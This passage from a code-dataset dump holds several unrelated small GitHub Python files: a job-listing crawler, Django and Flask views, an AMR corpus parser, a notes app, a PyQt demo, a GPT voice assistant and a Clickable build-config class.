worktime[6:11])\n l = int(l[:l.find(':')])*60 + int(l[l.find(':')+1:])\n r = int(r[:r.find(':')])*60 + int(r[r.find(':')+1:])\n return (l,r)\n\n def get_info_from_source(self, alba_site_number, source) :\n '''\n source : 주소 url에 request를 날린 text\n return : dict\n {\n 'sex' : str, '남자', '여자', '무관'\n 'age' : tuple(int, int), (낮은 나이, 높은 나이), 없으면(None, None)\n 'address' : str\n 'pay' : int\n 'type_of_pay' : str, '월급', '일급', etc\n 'worktime' : tuple(int, int), (시작 시간의 분, 끝 시간의 분), 없으면(None, None)\n 'alba_site_name' : str\n 'alba_site_number' : str\n }\n '''\n soup = BeautifulSoup(source, 'html.parser')\n condition_selector = '#allcontent > div.viewContent.viewRecruitType > div.viewTypeFullWidth > div.conditionInfo.verticalLine > div.column.column_620.infoBox > div.recruitCondition > div > table > tbody'\n info = {}\n for tr_tag in soup.select(condition_selector)[0].find_all(\"tr\") :\n if tr_tag.find(\"th\").text == \"성별\" :\n info['sex'] = tr_tag.find(\"span\").text\n if tr_tag.find(\"th\").text == \"연령\" :\n info['age'] = self.norm_age(tr_tag.find(\"span\").text)\n info['address']= soup.select(\n f'div.viewContent.viewRecruitType > div.viweTab > div.tabItem_workArea > div.workAddr > span')[0].text\n info['pay']= self.norm_pay(soup.select(\n f'div.workCondition > div.viewTable > table > tbody > tr:nth-child(1) > td > div.payInfoBox > span.monthPay')[0].text)\n info['type_of_pay']= soup.select(\n f'div.workCondition > div.viewTable > table > tbody > tr:nth-child(1) > td > div.payInfoBox > span.textPoint > strong')[0].text\n info['worktime']= self.norm_worktime(soup.select(\n f'div.workCondition > div.viewTable > table > tbody > tr:nth-child(4) > td > span')[0].text.strip())\n info['alba_site_name'] = 'albamon'\n info['alba_site_number'] = alba_site_number\n return info\n \n def crawl_from_site(self) :\n PAGE_NUM = 1\n SLEEP_TIME = 5.0\n\n #PAGE_NUM만큼 URL 리스트를 뽑는다.\n #알바몬은 한 페이지 당 20개\n detail_url_list = []\n for page in range(1, 1+PAGE_NUM) :\n time.sleep(SLEEP_TIME)\n source = requests.get(self.base_url + f'/list/gi/mon_gi_tot_list.asp?page={page}').text\n soup = BeautifulSoup(source, 'html.parser')\n \n for i in range(5) :\n #for i in range(20) :\n detail_url_list.append(soup.select(f'td.subject > div.subWrap > p.cName > a')[i]['href'])\n\n #URL 리스트들에서 소스를 얻어낸다\n for i in detail_url_list :\n self.detail_source_list.append((i, requests.get(self.base_url + i).text))\n time.sleep(SLEEP_TIME)\n \n #소스들을 피클로 저장\n save_pkl_file_name = 'albamon_source_' + str(datetime.now().isoformat(sep='_')).replace(':','-') +'.pkl'\n with open(save_pkl_file_name, 'wb') as f:\n pickle.dump(self.detail_source_list, f)\n \n def get_alba_site_number_form_url(self, url) :\n end_pos = url.find('&mj_stat')\n return url[26:end_pos]\n \n def get_info_list(self) :\n # open_pkl_file_name = 'C:\\\\Users\\\\Green\\\\Desktop\\\\2020_hongik_project\\\\app\\\\midterm_alba\\\\crawler\\\\albamon_source_2020-05-21_14-09-07.593744.pkl'\n # with open(open_pkl_file_name, 'rb') as f:\n # self.detail_source_list = pickle.load(f)\n self.crawl_from_site()\n result = []\n for i in self.detail_source_list :\n result.append(self.get_info_from_source(self.get_alba_site_number_form_url(i[0]), i[1]))\n return result\n","repo_name":"green5555/2020-hongik-project","sub_path":"app/crawler/bot/albamon.py","file_name":"albamon.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6596477873","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom .models import Room\nfrom django import forms\n\ndef index(request):\n print()\n room = Room.objects.all()\n print(room)\n print()\n return render(request, \"room/room.html\", context={\"room\": room})\n\ndef personal_room (request, slug):\n room = Room.objects.get(slug=slug)\n print()\n print('personal room')\n print()\n return render(request, 'room/personal_room.html', context={'room': room})\n","repo_name":"Aniri2013/HomeWork25","sub_path":"gurt/room/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5228357409","text":"####\n# Concept : A concept is the value of an AMR node after the variable has been removed\n# Concept cleaning : Includes removal of quotation marks and stripping out number tags\n\nimport re\nfrom Node_class import node, parse_amr;\nfrom AlignmentEvaluator_class import AlignmentEvaluator\n\nclass AMR:\n\n\tdef __init__(self):\n\t\tself.ID = '';\n\t\tself.date = '';\n\t\tself.annotator = '';\n\t\tself.sentence = '';\n\t\tself.save_date = '';\n\t\tself.file = '';\n\t\tself.tokens = [];\n\t\tself.alignments = '';\n\t\tself.alignment_annotator = '';\n\t\tself.alignment_date = '';\n\t\tself.NumberOfConcepts = 0;\n\t\tself.AMR_string_printable = '';\t\t\t#AMR string prints just like in the original file\n\t\tself.AMR_aligned_string_printable = '';\t#AMR string annotated with alignment information prints in tree format\n\t\tself.AMR_string_parsable = '';\t\t\t#Linearized AMR string\n\t\tself.AMR_tree = None;\t\n\t\tself.AMR_tree_aligned = None;\t\t\t#AMR tree annotated with alignment information\n\t\tself.AMR_dict = {};\t\t\t\t\t\t#facilitates AMR string and tree lookup by ID\n\t\tself.Evaluator = AlignmentEvaluator();\n\t\t\n\t#\tMethods :\n\n\t#\tread(self,s)\n\t#\tevaluate_alignments\n\t#\tprint_alignments\n\t#\tgenerate_printable_AMR\n\t#\tgenerate_writable\n\t#\tprintAMR\n\t#\tgetNodeByAddress\n\t#\tannotate_node\n\t#\tconvertISItoJAMR\n\t#\tgetConcepts\n\t#\tgetTokens\n\t#\tgetAlignments\n\t#\tgetAMRTree\n\t#\tgetAMRStringByID\n\t#\tgetAMRTreeByID\n\t#\tsetAlignments\n\t\n\tdef read(self,s):\n\t#reads a string that describes the AMR and parses the string into components\n\t\ts = s.split('\\n');\n\t\t#Read AMR literal\n\t\tif s[3][0] == '#':\t\t#indicates that there is an alignment line\n\t\t\talignment_line = (s[3]).split();\n\t\t\tself.alignments = alignment_line[2:-5];\t#remove the ::alignment tag\n\t\t\tAMR_lines = s[4:];\n\t\telse: AMR_lines = s[3:];\n\t\tself.AMR_string_printable='\\n'.join(AMR_lines);\n\t\tself.AMR_aligned_string_printable=self.AMR_string_printable;\n\t\t\n\t\tAMR_lines = map(lambda s: s.lstrip(),AMR_lines);\t\n\t\tself.AMR_string_parsable=' '.join(AMR_lines);\n\t\n\t\tID_line = s[0];\n\t\tID_line = ID_line.split();\n\t\tfor i in range(0,len(ID_line)):\n\t\t\tprev_token=ID_line[i-1];\n\t\t\tif(prev_token == '::id'):\n\t\t\t\tself.ID = ID_line[i];\n\t\t\tif(prev_token == '::date'):\n\t\t\t\tself.date = ID_line[i];\n\t\t\tif(prev_token == '::annotator'):\n\t\t\t\tself.annotator = ID_line[i];\n\t\tself.AMR_tree = parse_amr(self.AMR_string_parsable);\t\t\n\t\tself.AMR_tree_aligned = self.AMR_tree;\n\t\tself.AMR_dict[self.ID] = [self.AMR_string_printable, self.AMR_tree];\t#Ideally, we should be able to generate the printable string from the tree. \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#Then we wouldn't have to save the printable string at all.\n\n\t\tself.NumberOfConcepts = len(self.getConcepts(0));\n\t\tsnt_line = s[1];\t\n\t\tself.sentence = snt_line[8:];\n\n\t#\ttok_line = s[3];\n\t#\tself.tokens = (tok_line[8:]).split();\n\t#\t#print self.tokens;\t\n\n\t#\tfor i in range(0,len(alignment_line)):\t#not sure what this is for, probably some border case\n\t#\t\tif alignment_line[i] == ':':\n\t#\t\t\tbreak;\n\t#\talignment_line = alignment_line[:i-1];\t\n\t#\ttemp_split = alignment_line.split();\t\n\t#\talignments = '';\n\t#\tfor item in temp_split[:-5]:\t\t\t#remove the last 5 tokens after splitting. These are other metadata.\n\t#\t\talignments = alignments + \" \" + item;\n\t#\talignments = alignments[1:];\n\n\t\treturn;\n\t\n\tdef evaluate_alignments(self, true_alignments):\n\t\n\t\tself.Evaluator.read(self.alignments, true_alignments, 0, self.AMR_tree);\n\t\tself.Evaluator.evaluate();\n\t\treturn self.Evaluator.getStatistics();\n\n\tdef print_alignments(self):\n\t\t\n\t\tself.Evaluator.print_alignments();\n\n\tdef generate_printable_AMR(self):\n\n\t\tself.AMR_aligned_string_printable = self.AMR_tree_aligned.generatePrintableAMR('','\\t');\n\t\t\n\t'''\n\t Generates the AMR in corpus format. If annotation_flag is set, checks if alignment string is null,\n\t if not, adds alignments to the nodes. \n\t'''\n\tdef generate_writable(self, annotation_flag):\n\t\n\t\ts = '';\n\t\ts = s + \"# ::id \" + self.ID + '\\n';\n\t\ttokens = self.sentence.split();\n\t\tsentencewithnum = '';\n\t\tfor i in range(0,len(tokens)):\n\t\t\tsentencewithnum += (tokens[i]+'-'+str(i)+' ');\n\t\ts = s + \"# ::snt \" + sentencewithnum[:-1] + '\\n';\n\t\ts = s + \"# ::save-date\\n\";\n\t\t#s = s + \"# ::tok\";\n\t\t#for i in range(0,len(self.tokens)):\n\t\t#\ts = s + ' ' + str(i) + '-' + self.tokens[i];\n\t\t#s = s + '\\n';\n\t\ts = s + '# ::alignments ' + ' '.join(self.alignments) + ' * * * * *\\n';\n\t\tif annotation_flag and len(self.alignments) != 0:\n\t\t\tfor alignment in self.alignments:\n\t\t\t\talignment = alignment.split('|');\n\t\t\t\taddress = alignment[1];\n\t\t\t\ttoknum = alignment[0].split('-');\n\t\t\t\ttoknum = toknum[0];\n\t\t\t\tself.annotate_node(address, toknum);\t\n\t\t\tself.AMR_aligned_string_printable = self.AMR_tree_aligned.generatePrintableAMR('','\\t',False);\n\t\ts = s + self.AMR_aligned_string_printable;\n\t\ts = s + '\\n';\n\t\t\n\t\treturn s;\n\n\tdef printAMR(self):\n\t\t\n\t\tself.AMR_tree.printSubtree('1');\n\t\treturn;\n\n\tdef getNodeByAddress(self,address,jamr_addr):\n \n\t\trole = 0;\n\t\tif address[-1] == 'r':\n\t\t\taddress = address[:-2]; \n\t\t\trole = 1;\n\t\tif address == '1':\n\t\t\treturn (self.AMR_tree).getValue();\n\t\treturn (self.AMR_tree).getNode(address[2:],role,jamr_addr);\n\n\tdef getSubtreeAddress(self, address):\n\t\n\t\ti = address.find('.'); \n\t\t\n\t\tif i == -1: \n\t\t\treturn int(address)-1, address;\n\t\t\n\t\tchildnum = int(address[0:i])-1;\n\t\treturn childnum, address[i+1:];\n\n\t'''\n\t Find the AMR node using given address and annotates the concept with given\n\t token number.\n\t'''\n\tdef annotate_node(self, address, token_number):\n\n\t\t#If my getNode and getNodeByAddress functions were designed better, I wouldn't have to access the tree directly. \n\t\t#Right now, those functions return the value at node. Instead, they should simply return the node itself.\n\t\t#Now there's too many strings attached to those functions and I'm afraid I'll mess something up.\n\t\tif (address == '1'): node = self.AMR_tree_aligned;\n\t\telse: \n\t\t\tc, addr = self.getSubtreeAddress(address);\n\t\t\tnode = self.AMR_tree_aligned.getNodePointer(addr, 0, 1);\t\n\n\t\tv = node.getValue();\n\t\ti = v.find('/');\n\t\n\t\tif i == -1 or v[0] == '\"':\t#leaf node\n\t\t\tnewval = v+\"~\"+str(token_number);\n\t\telse:\n\t\t\tv = v.split();\t#v[0] is the variable, v[1] is the '/' character and v[2] is the concept name\n\t\t\tnewval = v[0]+\"~\"+str(token_number) + \" / \" + v[2];\n\n\t\tnode.setValue(newval);\n\n\tdef convertISItoJAMR(self,address):\n\t\t\n\t\tif address == '1': return '1';\n\t\treturn (self.AMR_tree).ISItoJAMR(address[2:],'1');\n\t\n\tdef cleanConcept(self, concept):\n\t#Takes a concept as input and returns the cleaned version\n\t\t#print \"__\"+concept+\"__\";\t\n\t\tif len(concept) > 1 and concept[0] == '\"': concept = concept[1:-1]; #Remove quotation marks\n\t\tconcept = re.sub('\\-[0-9]+$','',concept); #Remove number tags\n\t\n\t\treturn concept;\n\t\n\tdef getConcepts(self, clean):\n\t#clean == 1 means the concepts should be cleaned. \n\t#Returns a list of tuples of the form (concept, address).\n\n\t\tclist = self.AMR_tree.getConcepts('1');\n\t\tif clean: \n\t\t\tcleanclist = [(self.cleanConcept(x[0]),x[1]) for x in clist];\n\t\t\tclist = cleanclist;\n\t\treturn clist;\n\t\n\tdef linearize(self):\t\n\n\t\tlinearAMR = self.AMR_tree.linearize('1');\n\t\treturn linearAMR;\n\t\t\n\tdef getTokens(self):\n\t\t\n\t\treturn (self.sentence).split();\t\n\t\n\tdef getAlignments(self):\n\t\t\n\t\treturn self.alignments;\n\t\n\tdef getAMRTree(self):\n\t\t\n\t\treturn self.AMR_tree;\n\n\tdef getAMRStringByID(self,ID):\n\t\t\n\t\treturn self.AMR_dict[ID][0];\n\t\n\tdef getAMRTreeByID(self,ID):\n\t\t\n\t\treturn self.AMR_dict[ID][1];\n\n\tdef setAlignments(self,alignments):\n\t\t\n\t\tself.alignments = alignments;\n\n#Reads a corpus file and returns a list of AMR objects\t\ndef read_corpus_file(fname):\n\n\tamr_objects = [];\t\n\t\n\tf=open(fname);\n\ts=f.read();\n\tf.close();\n\t\n\ts = s.split('\\n\\n');\t\n\tdel s[0];\n\tdel s[-1];\n\t\n\tfor amr_desc in s:\n\t\ta = AMR();\n\t\ta.read(amr_desc);\n\t\t#print a.ID;\n\t\tamr_objects.append(a);\n\t\t\n\treturn amr_objects;\n","repo_name":"pgoel92/AMR-One","sub_path":"lib/AMR_class.py","file_name":"AMR_class.py","file_ext":"py","file_size_in_byte":7680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10014397255","text":"\"\"\"\nReturn function boundary_name(x) that returns True if x is within the boundary and False otherwise.\n\"\"\"\nimport numpy as np\n\nimport triangle_intersection as ti\nimport bga_4_0 as bga\nimport statistics as sts\n\ndef get_boundary(boundary_name, kwargs={}, binary=False):\n if boundary_name == None:\n if binary == True:\n return lambda x, y: True\n else:\n return lambda x: True\n return globals()[boundary_name](**kwargs)\n try:\n return globals()[boundary_name](**kwargs)\n except (KeyError, NameError):\n raise Exception(\"ERROR: \" + boundary_name + \" not found.\")\n \n###--------------------------------------------------------------------------\ndef positive_boundary():\n return lambda x: min(x) >= 0.0\n\n####--------------------------------------------------------------------------\n#def none():\n# return lambda x: True\n\n###--------------------------------------------------------------------------\ndef self_intersection(poly_name=None, int_num=None):\n \"\"\"\n For building game intermediates, test for intersection of triangles.\n \"\"\"\n try:\n q0, links, lengths, faces = bga.load_bg_int(poly_name, int_num)\n return lambda x: self_intersection_fun(x, faces)\n except (ValueError, IndexError):\n raise Exception(\"ERROR: Building game intermediate \" + str(int_num) + \n \" for \" + polyname + \" not found.\")\n\ndef adjacent_faces(j, k, faces):\n return len(set(faces[j]).intersection(set(faces[k]))) == 2\n \ndef self_intersection_fun(x, faces):\n F = len(faces)\n for j in range(F):\n for k in range(j+1, F):\n if adjacent_faces(j, k, faces) == True:\n continue\n if ti.triangle_intersection(ti.get_face(x, faces[j]), \n ti.get_face(x, faces[k]), \n scaling=0.99) == True:\n return False\n return True\n###--------------------------------------------------------------------------\ndef dihedrals(poly_name=None, int_num=None):\n \"\"\"\n For building game intermediates, test for dihedral angle sign switches.\n \"\"\"\n try:\n q0, links, lengths, faces = bga.load_bg_int(poly_name, int_num)\n except (ValueError, IndexError):\n raise Exception(\"ERROR: Building game intermediate \" + str(int_num) + \n \" for \" + polyname + \" not found.\")\n \n dihedral_inds = []\n F = len(faces)\n for j in range(F):\n for k in range(j+1, F):\n if adjacent_faces(j, k, faces) == True:\n dihedral_inds.append(order_verts(faces[j], faces[k]))\n \n return lambda x, y: dihedrals_fun(x, y, dihedral_inds=dihedral_inds)\n\n\ndef dihedrals_fun(x, y, dihedral_inds=None):\n \"\"\"\n Compare the dihedrals of x and y and check for sign change. \n \"\"\"\n x_dihedrals = get_dihedrals(x, dihedral_inds)\n y_dihedrals = get_dihedrals(y, dihedral_inds)\n\n if max(abs(x_dihedrals - y_dihedrals)) > 2.0:\n return False\n else:\n return True\n\ndef get_dihedrals(y, dihedral_inds=None):\n \"\"\"\n Compure the dihedral angles at y.\n \"\"\"\n dihedrals = np.zeros(len(dihedral_inds))\n for k, di in enumerate(dihedral_inds):\n dihedrals[k] = sts.signed_dihedral_angle(y, di[0], di[1], di[2], di[3])\n return dihedrals\n\ndef order_verts(v1, v2):\n \"\"\"\n get order of vert inds for dihedral calculation.\n \"\"\"\n common_verts = set(v1).intersection(set(v2))\n ordered_verts = [list(set(v1).difference(common_verts))[0],\n list(common_verts)[0],\n list(common_verts)[1],\n list(set(v2).difference(common_verts))[0]]\n return ordered_verts\n###--------------------------------------------------------------------------\n","repo_name":"Danie1Johnson/research","sub_path":"boundaries.py","file_name":"boundaries.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41111566677","text":"import Model.Import_to_file as Import_to_file\nimport Model.Notes as Notes\nimport Controller.Menu as Menu\n\nnumber = 6 # сколько знаков МИНИМУМ может быть в тексте заметки\n\n# данный метод добавляет заметку в файл\ndef add():\n note = Menu.create_note(number)\n note_in_file = Import_to_file.read_file()\n for notes in note_in_file:\n if Notes.Notes.get_id(note) == Notes.Notes.get_id(notes):\n Notes.Notes.set_id(note)\n note_in_file.append(note)\n Import_to_file.write_file(note_in_file, 'a')\n print('Заметка добавлена...')\n\n# данный метод показывает определенную информацию в зависимости от выбора пользователя\ndef show(text):\n logic = True\n note_in_file = Import_to_file.read_file()\n # выборка заметок по дате\n if text == 'date':\n date = input('Введите дату в формате dd.mm.yyyy: ')\n # вывод всех заметок\n for notes in note_in_file:\n if text == 'all':\n logic = False\n print(Notes.Notes.map_note(notes))\n # вывод заметок по ID\n if text == 'id':\n logic = False\n print('ID: ' + Notes.Notes.get_id(notes))\n # сортировка заметок по дате\n if text == 'date':\n logic = False\n if date in Notes.Notes.get_date(notes):\n print(Notes.Notes.map_note(notes))\n if logic == True:\n print('Нет ни одной заметки...')\n\n#данный метод удаляет заметку либо же изменяет её в зависимости от того что ввел пользователь\ndef id_edit_del_show(text):\n id = input('Введите id заметки: ')\n note_in_file = Import_to_file.read_file()\n logic = True\n for notes in note_in_file:\n if id == Notes.Notes.get_id(notes):\n logic = False\n # изменение заметки\n if text == 'edit':\n note = Menu.create_note(number)\n Notes.Notes.set_title(notes, note.get_title())\n Notes.Notes.set_body(notes, note.get_body())\n Notes.Notes.set_date(notes)\n print('Заметка изменена...')\n # удаление заметки\n if text == 'del':\n note_in_file.remove(notes)\n print('Заметка удалена...')\n # вывод всех заметок\n if text == 'show':\n print(Notes.Notes.map_note(notes))\n if logic == True:\n print('Такой заметки нет, возможно, вы ввели неверный id')\n Import_to_file.write_file(note_in_file, 'a')","repo_name":"Dina7919/SeminarsPython","sub_path":"Control_task_python_1/Model/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72046429530","text":"import sqlite3\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n\ndef create_cursor():\n connection = sqlite3.connect('chinook.db')\n return connection\n\n\n@app.route('/names')\ndef get_names():\n with create_cursor() as cursor:\n query = cursor.execute('SELECT DISTINCT (FirstName) FROM customers')\n data = query.fetchall()\n\n return jsonify(unique_names=str(len(data)))\n\n\n@app.route('/customers/')\ndef get_customers():\n with create_cursor() as cursor:\n\n conditions = []\n\n try:\n customer_id = int(request.args['id']) # id\n conditions.append(f'CustomerId = {customer_id}')\n except (ValueError, KeyError): # id = not int\n pass\n\n country = request.args.getlist('country') # country\n if country:\n n = \", \".join(repr(e) for e in country)\n conditions.append(f'Country IN ({n})')\n\n fax_parameters = {\n 'is_null': 'Fax IS NULL',\n 'is_not_null': 'Fax IS NOT NULL',\n }\n fax = fax_parameters.get(request.args.get('fax')) # fax\n if fax: # if fax is true\n conditions.append(fax)\n\n # request\n if conditions: # if conditions is not empty\n where = ' OR '.join(conditions) # OR\n query = f'SELECT * FROM customers WHERE {where}'\n else:\n query = 'SELECT * FROM customers'\n\n customers = cursor.execute(query)\n\n results = customers.fetchall()\n # print(conditions)\n return jsonify(results)\n\n\n@app.route('/tracks')\ndef gef_tracks():\n with create_cursor() as cursor:\n query = cursor.execute('SELECT Count(*) FROM tracks')\n data = query.fetchall()\n\n return jsonify(data)\n\n\n@app.route('/tracks-sec')\ndef gef_tracks_sec():\n with create_cursor() as cursor:\n query = cursor.execute('SELECT Name, Milliseconds/1000 FROM tracks')\n data = query.fetchall()\n\n return jsonify(data)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"avtodorov/DZ3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37377230582","text":"from PyQt6 import QtWidgets, QtCore # 將 PyQt6 換成 PyQt5 就能改用 PyQt5\nimport sys\n\nclass MyWidget(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('oxxo.studio')\n self.resize(300, 200)\n self.ui()\n\n def ui(self):\n self.slider = QtWidgets.QSlider(self) # 加入數值調整滑桿\n self.slider.move(20,20)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n Form = MyWidget()\n Form.show()\n sys.exit(app.exec())\n\n","repo_name":"oxxostudio/book-code","sub_path":"pyqt/ch06/code12_class.py","file_name":"code12_class.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"72445032092","text":"import os\nimport openai\nimport requests\nimport io\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom decouple import config\nimport speech_recognition as sr\n\nopenai.api_key = config('OPENAI_API_KEY')\nELEVEN_LABS_API_KEY = config('ELEVEN_LABS_API_KEY')\nELEVEN_LABS_API_URL = \"https://api.elevenlabs.io/v1/text-to-speech/piTKgcLEGmPE4e6mEKli/stream\"\n\ndef text_to_speech(text):\n headers = {\n \"Accept\": \"audio/mpeg\",\n \"Content-Type\": \"application/json\",\n \"xi-api-key\": ELEVEN_LABS_API_KEY\n }\n data = {\n \"text\": text,\n \"model_id\": \"eleven_monolingual_v1\",\n \"voice_settings\": {\n \"stability\": 0.5,\n \"similarity_boost\": 0.5\n }\n }\n response = requests.post(ELEVEN_LABS_API_URL, json=data, headers=headers, stream=True)\n\n if response.status_code == 200:\n return response.content\n else:\n return None\n\ndef chat_with_gpt(prompt):\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an AI assistant, answer questions under 20 words.\"},\n {\"role\": \"user\", \"content\": prompt}\n ]\n )\n return completion.choices[0].message[\"content\"]\n\nrecognizer = sr.Recognizer()\nprint(\"AI: Hello! I'm here to help. You can start the conversation. Say 'exit' to end.\")\n\nwhile True:\n with sr.Microphone() as source:\n audio = recognizer.listen(source, timeout=3, phrase_time_limit=3)\n\n try:\n user_input = recognizer.recognize_google(audio)\n print(\"You:\", user_input)\n\n if user_input.lower() == \"exit\":\n print(\"AI: Goodbye!\")\n break\n\n gpt_response = chat_with_gpt(user_input)\n print(\"AI:\", gpt_response)\n\n gpt_audio = text_to_speech(gpt_response)\n\n if gpt_audio is not None:\n audio = AudioSegment.from_file(io.BytesIO(gpt_audio), format=\"mp3\")\n play(audio)\n except sr.WaitTimeoutError:\n print(\"AI: I'm waiting for your question. Please speak within 3 seconds.\")\n except sr.UnknownValueError:\n print(\"AI: Sorry, I couldn't understand your speech. Please speak clearly.\")\n except sr.RequestError as e:\n print(\"AI: There was an error in recognizing your speech; {0}\".format(e))\n","repo_name":"thesanju/GPT_voice_assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39407535068","text":"a = []\nwhile True:\n print('='*30)\n b = int(input('Digite um número inteiro: '))\n if b not in a:\n a.append(b)\n print('Adicionado com sucesso!')\n else:\n print('Esse número já foi adicionado anteriormente.')\n c = str(input('Deseja continuar? [S/N]: ')).upper().strip()\n print('='*30)\n if c == 'N':\n break\nprint(f'Você digitou os valores {a.sort()}')\n","repo_name":"igorvalamiel/material-python","sub_path":"Exercícios - Mundo 3/079.py","file_name":"079.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4944228765","text":"import os\n\nfrom clickable.utils import (\n merge_make_jobs_into_args,\n flexible_string_to_list,\n make_absolute,\n)\nfrom clickable.exceptions import ClickableException\nfrom clickable.logger import logger\nfrom .constants import Constants\nfrom collections import OrderedDict\nimport multiprocessing\nimport platform\n\n\nclass LibConfig(object):\n cwd = os.getcwd()\n config = {}\n\n placeholders = OrderedDict({\n \"ARCH_TRIPLET\": \"arch_triplet\",\n \"NAME\": \"name\",\n \"ROOT\": \"root_dir\",\n \"BUILD_DIR\": \"build_dir\",\n \"SRC_DIR\": \"src_dir\",\n \"INSTALL_DIR\": \"install_dir\",\n })\n accepts_placeholders = [\"root_dir\", \"build_dir\", \"src_dir\", \"install_dir\",\n \"build\",\n \"build_args\", \"make_args\", \"postmake\", \"postbuild\",\n \"prebuild\",\n \"env_vars\", \"build_home\"]\n\n path_keys = ['root_dir', 'build_dir', 'src_dir', 'install_dir',\n 'build_home']\n required = ['builder']\n flexible_lists = ['dependencies_host', 'dependencies_target',\n 'dependencies_ppa', 'dependencies_build',\n 'build_args', 'make_args']\n builders = [Constants.QMAKE, Constants.CMAKE, Constants.CUSTOM]\n\n first_docker_info = True\n container_mode = False\n use_nvidia = False\n gopath = None\n verbose = False\n\n def __init__(self, name, json_config, arch, root_dir, qt_version, debug_build, verbose):\n # Must come after ARCH_TRIPLET to avoid breaking it\n self.placeholders.update({\"ARCH\": \"arch\"})\n\n self.qt_version = qt_version\n self.debug_build = debug_build\n self.verbose = verbose\n\n self.set_host_arch()\n self.container_list = list(Constants.container_mapping[self.host_arch].values())\n\n self.config = {\n 'name': name,\n 'arch': arch,\n 'arch_triplet': None,\n 'template': None,\n 'builder': None,\n 'postmake': None,\n 'prebuild': None,\n 'build': None,\n 'postbuild': None,\n 'build_dir': '${ROOT}/build/${ARCH_TRIPLET}/${NAME}',\n 'build_home': '${BUILD_DIR}/.clickable/home',\n 'src_dir': '${ROOT}/libs/${NAME}',\n 'root_dir': root_dir,\n 'dependencies_build': [],\n 'dependencies_host': [],\n 'dependencies_target': [],\n 'dependencies_ppa': [],\n 'make_jobs': None,\n 'docker_image': None,\n 'build_args': [],\n 'env_vars': {},\n 'make_args': [],\n 'install_dir': '${BUILD_DIR}/install',\n 'image_setup': {},\n 'test': 'ctest',\n }\n\n # TODO remove support for deprecated \"template\" in clickable.json\n if \"template\" in json_config:\n logger.warning('Parameter \"template\" is deprecated in clickable.json. Use \"builder\" as drop-in replacement instead.')\n json_config[\"builder\"] = json_config[\"template\"]\n json_config[\"template\"] = None\n\n self.config.update(json_config)\n if self.config[\"docker_image\"]:\n self.is_custom_docker_image = True\n else:\n self.is_custom_docker_image = False\n\n self.cleanup_config()\n\n self.config['arch_triplet'] = Constants.arch_triplet_mapping[self.config['arch']]\n\n for key in self.path_keys:\n if key not in self.accepts_placeholders and self.config[key]:\n self.config[key] = os.path.abspath(self.config[key])\n\n self.substitute_placeholders()\n self.set_env_vars()\n\n self.check_config_errors()\n\n for key, value in self.config.items():\n logger.debug('Lib {} config value {}: {}'.format(name, key, value))\n\n def __getattr__(self, name):\n return self.config[name]\n\n def __setattr__(self, name, value):\n if name in self.config:\n self.config[name] = value\n else:\n super().__setattr__(name, value)\n\n def prepare_docker_env_vars(self):\n docker_env_vars = []\n env_dict = self.get_env_vars()\n\n env_dict[\"HOME\"] = self.config[\"build_home\"]\n\n for key, val in env_dict.items():\n docker_env_vars.append('-e {}=\"{}\"'.format(key, val))\n\n return \" \".join(docker_env_vars)\n\n def set_env_vars(self):\n os.environ.update(self.get_env_vars())\n\n def get_env_vars(self):\n env_vars = {}\n\n if self.debug_build:\n env_vars['DEBUG_BUILD'] = '1'\n\n for key, conf in self.placeholders.items():\n env_vars[key] = self.config[conf]\n\n env_vars.update(self.config['env_vars'])\n\n return env_vars\n\n def substitute(self, sub, rep, key):\n if self.config[key]:\n if isinstance(self.config[key], dict):\n self.config[key] = {k: val.replace(sub, rep) for (k, val) in self.config[key].items()}\n elif isinstance(self.config[key], list):\n self.config[key] = [val.replace(sub, rep) for val in self.config[key]]\n else:\n self.config[key] = self.config[key].replace(sub, rep)\n\n def substitute_placeholders(self):\n for key in self.accepts_placeholders:\n for sub in self.placeholders:\n rep = self.config[self.placeholders[sub]]\n self.substitute(\"${\"+sub+\"}\", rep, key)\n # TODO remove deprecated syntax $VAR\n self.substitute(\"$\"+sub, rep, key)\n if key in self.path_keys and self.config[key]:\n self.config[key] = make_absolute(self.config[key])\n\n def cleanup_config(self):\n if not self.config['make_jobs']:\n self.config['make_jobs'] = multiprocessing.cpu_count()\n self.make_args = merge_make_jobs_into_args(\n make_args=self.make_args, make_jobs=self.make_jobs)\n\n if self.config['dependencies_build']:\n self.config['dependencies_host'] += self.config['dependencies_build']\n self.config['dependencies_build'] = []\n logger.warning('\"dependencies_build\" is deprecated. Use \"dependencies_host\" instead!')\n\n for key in self.flexible_lists:\n self.config[key] = flexible_string_to_list(self.config[key])\n\n def check_config_errors(self):\n if not self.config['builder']:\n raise ClickableException(\n 'The clickable.json is missing a \"builder\" in library 